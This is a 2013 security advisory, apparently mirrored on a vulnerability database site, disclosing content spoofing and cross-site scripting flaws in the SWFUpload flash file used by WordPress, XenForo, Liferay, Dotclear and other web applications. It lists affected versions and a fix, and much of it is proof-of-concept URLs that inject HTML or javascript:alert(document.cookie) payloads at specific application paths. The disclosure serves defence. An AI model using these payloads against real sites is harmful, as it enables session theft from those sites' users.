Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:29323
HistoryMay 06, 2013 - 12:00 a.m.

Vulnerabilities in SWFUpload in multiple web applications: WordPress, Dotclear, InstantCMS, AionWeb and others

2013-05-0600:00:00
vulners.com
31
JSON

Hello 3APA3A!

Earlier I've wrote about Content Spoofing and Cross-Site Scripting vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html). This is very popular flash-file, which is used at tens millions of web sites and in hundreds of web applications (only WordPress is used at more then 62 millions of web sites according to wordpress.com).

Last year I've wrote about other XSS hole in SWFUpload and I mentioned that there are many web applications with vulnerable SWFUpload. All of them are vulnerable to these new vulnerabilities, except swfupload.swf bundled with WordPress since version 3.3.2.

There are different names of files of SWFUpload: swfupload.swf, swfupload_f9.swf, swfupload_f8.swf, swfupload_f10.swf and swfupload_f11.swf. Many web applications include few swf-files of SWFUpload. Not all of these swf-files are vulnerable to new holes: swfupload_f8.swf and swfupload_f9.swf are not vulnerable (they have no buttonText functionality according to my research).

So from those web applications the next are vulnerable (plus many other web applications):

swfupload.swf - Dotclear, XenForo, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, SentinelleOnAir.

swfupload_f10.swf - SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter, SentinelleOnAir.

swfupload_f11.swf - SentinelleOnAir.

Also InfoGlue is vulnerable (about XSS vulnerability in ZeroClipboard.swf in which I've wrote last month), because it has SWFUpload too.

Affected products:

Vulnerable are all web applications with SWFUpload (v2.2.0.1 and previous versions).

Vulnerable are versions WordPress 2.7 - 3.3.1 (which bundled with swfupload.swf). The fixed version of swfupload.swf in WP 3.3.2 contain fix as for previous XSS, as for these CS and XSS vulnerabilities (even WP developers didn't write about it).

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb, Dolphin, SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir. There is no information that they have fixed these vulnerabilities in their software (at that these holes were fixed together with another XSS hole in WordPress 3.3.2 at 20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this vulnerability was fixed and patch was released for previous versions. They used the same swf-file, as in WP 3.3.2, so it contains a fix as for previous XSS, as for these CS and XSS vulnerabilities (even XenForo developers didn't write about it, because they didn't know that, since WP developers did it secretly).

Fix:

Use swfupload.swf from WordPress 3.3.2 and higher versions. All web developers need to update their vulnerable version of SWFUpload to this fixed version.

Details:

There are two vulnerabilities in SWFUpload.

Content Spoofing (WASC-12):

http://site/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

It's possible to inject text, images and html (e.g. for link injection).

Cross-Site Scripting (WASC-08):

http://site/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Code will execute after click. It's strictly social XSS.

These are examples of XSS vulnerability in different web applications:

WordPress:

http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dotclear:

http://site/inc/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InstantCMS:

http://site/includes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Swfupload for Drupal:

As it can be seen from the project http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload for Drupal. But exactly in this project there are no files. But they are in the project Respectiva (http://code.google.com/p/respectiva/), which is Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/upload/swfupload/swfupload10.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

http://site/upload/swfupload/swfupload11.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

InfoGlue:

Previous XSS vulnerabilities:

http://site/webapp/applications/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/webapp/applications/swfupload/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/webapp/applications/swfupload/swfupload_f9.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

New XSS vulnerability:

http://site/webapp/applications/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON